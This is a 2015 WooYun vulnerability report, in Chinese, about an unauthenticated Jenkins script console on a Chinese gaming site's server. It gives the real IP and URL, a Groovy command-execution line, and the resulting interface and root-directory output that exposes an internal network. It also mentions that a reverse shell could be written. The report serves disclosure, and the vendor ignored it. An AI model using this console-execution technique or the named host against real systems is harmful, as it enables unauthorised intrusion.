当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0131690
漏洞标题:
中国玩家网某服务器运帷不当可Getshell进内网
相关厂商:
中国玩家网
漏洞作者:
new
提交时间:
2015-08-06 11:33
修复时间:
2015-08-11 11:34
公开时间:
2015-08-11 11:34
漏洞类型:
未授权访问/权限绕过
危害等级:
自评Rank:
20
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中国玩家网jenkins未授权访问,getshell进内网

详细说明:

http://180.168.34.2:8080/script
http://www.cwan.com/
虽然jenkins的js丢了,但是命令照样执行

print "uname -a".execute().text
Result
Linux host.cwan.com 2.6.18-348.6.1.el5 #1 SMP Tue May 21 15:29:55 EDT 2013 x86_64 x86_64 x86_64 GNU/Linux
eth0      Link encap:Ethernet  HWaddr 00:22:19:56:76:D2  
          inet addr:180.168.34.2  Bcast:180.168.34.3  Mask:255.255.255.252
          inet6 addr: fe80::222:19ff:fe56:76d2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:235441619 errors:0 dropped:0 overruns:0 frame:0
          TX packets:348305902 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:129528016945 (120.6 GiB)  TX bytes:255686003971 (238.1 GiB)
          Interrupt:169 Memory:f8000000-f8012800 
eth1      Link encap:Ethernet  HWaddr 00:22:19:56:76:D4  
          inet addr:192.168.2.222  Bcast:192.168.2.255  Mask:255.255.255.0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:169 Memory:f4000000-f4012800 
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:12982475 errors:0 dropped:0 overruns:0 frame:0
          TX packets:12982475 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:2253308517 (2.0 GiB)  TX bytes:2253308517 (2.0 GiB)

漏洞证明:

total 580
drwxr-xr-x  29 root root    4096 Feb  2  2015 .
drwxr-xr-x  29 root root    4096 Feb  2  2015 ..
-rw-r--r--   1 root root       0 Aug 13  2014 .autofsck
-rw-r--r--   1 root root       0 Feb 26  2013 .autorelabel
drwxr-xr-x   2 root root    4096 Feb  3  2015 bin
drwxr-xr-x   4 root root    3072 Nov 25  2013 boot
drwxr-xr-x  13 root root    4096 Jun  3  2014 data
drwxr-xr-x  11 root root    3640 Aug 13  2014 dev
drwxr-xr-x  98 root root   12288 Aug  3 04:02 etc
drwxr-xr-x   6 root root    4096 Jul 12  2013 home
-rw-rw-rw-   1 root root   22632 Dec 23  2013 items.json
drwxr-xr-x  11 root root    4096 Feb  3  2015 lib
drwxr-xr-x   8 root root    4096 Feb  3  2015 lib64
drwx------   2 root root   16384 Feb 26  2013 lost+found
drwxr-xr-x   2 root root    4096 May 11  2011 media
drwxr-xr-x   2 root root       0 Feb  2  2015 misc
drwxr-xr-x   2 root root    4096 May 11  2011 mnt
drwxr-xr-x   3  501 games   4096 Dec  9  2013 mod_wsgi-3.3
-rw-r--r--   1 root root  117930 Jul 26  2010 mod_wsgi-3.3.tar.gz
-rw-r--r--   1 root root  117930 Jul 26  2010 mod_wsgi-3.3.tar.gz.1
drwxr-xr-x   3  501 games   4096 Dec 10  2013 mod_wsgi-3.4
-rw-r--r--   1 root root  122739 Aug 23  2012 mod_wsgi-3.4.tar.gz
drwxr-xr-x   2 root root       0 Feb  2  2015 net
drwxr-xr-x   4 root root    4096 Dec  9  2013 opt
dr-xr-xr-x 215 root root       0 Aug 13  2014 proc
drwxr-x---  35 root root    4096 Feb  6 15:01 root
drwxr-xr-x   2 root root   12288 Feb  3  2015 sbin
drwxr-xr-x   2 root root    4096 Feb 26  2013 selinux
drwxr-xr-x   2 root root    4096 May 11  2011 srv
drwxr-xr-x  11 root root       0 Aug 13  2014 sys
drwxrwxrwt   7 root root    4096 Aug  4 14:58 tmp
drwxr-xr-x  20 root root    4096 Apr 24  2014 usr
drwxr-xr-x  24 root root    4096 Dec 24  2013 var
drwxr-xr-x   4 www  www     4096 Aug 13  2014 zcs
drwxr-xr-x   2 root root    4096 Feb  2  2015 zues


你有 777 的目录,我就可以写python脚本,就能写反弹shell了,想想我只是为了刷点wb,赚点奖品,还是算了
没图不完整,so

222.png

修复方案:

修改jenkins配置,修改访问控制策略
给我20rank

版权声明:转载请注明来源 new@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-08-11 11:34

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无